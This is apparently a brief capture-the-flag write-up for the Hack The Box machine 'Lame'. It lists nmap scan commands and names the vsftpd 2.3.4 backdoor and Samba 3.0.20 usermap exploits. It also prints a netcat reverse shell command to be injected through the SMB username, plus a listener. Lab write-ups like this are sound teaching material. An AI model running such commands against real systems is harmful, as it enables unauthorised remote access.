Lame
By Shengtuo Hu • 1 minute read •
- Lame (Easy): https://www.hackthebox.com/machines/lame
- My notes: https://github.com/h1994st/HTB/blob/main/Lame/NOTES.md
Port Scanning
sudo nmap -vv -n -e utun6 -sS -sV --top-ports 1000 $ipaddr
sudo nmap -vv -sC -sV -T4 -A $ipaddr
-vv: verbose-n: no DNS resolution-e: choose the correct network interface-sS: TCP SYN scan-sC: script scan-sV: service version detection--top-ports: specify top N ports-T4: timing template (higher is faster)-A: aggressive scan options. Enable OS detection, version detection, script scanning, and traceroute
Exploits
- vsftpd 2.3.4 - Backdoor Command Execution
- This exploit successes, but external connections cannot be established due to some firewall configurations
- Samba 3.0.20 usermap
- This exploit can run arbitrary commands that are specified in the SMB username
- We can utilize this exploit to establish a reverse shell, such as
nc -e /bin/sh $myip $myport - On my local machine, running
nc -nlvp $myportcan interact with the remote machine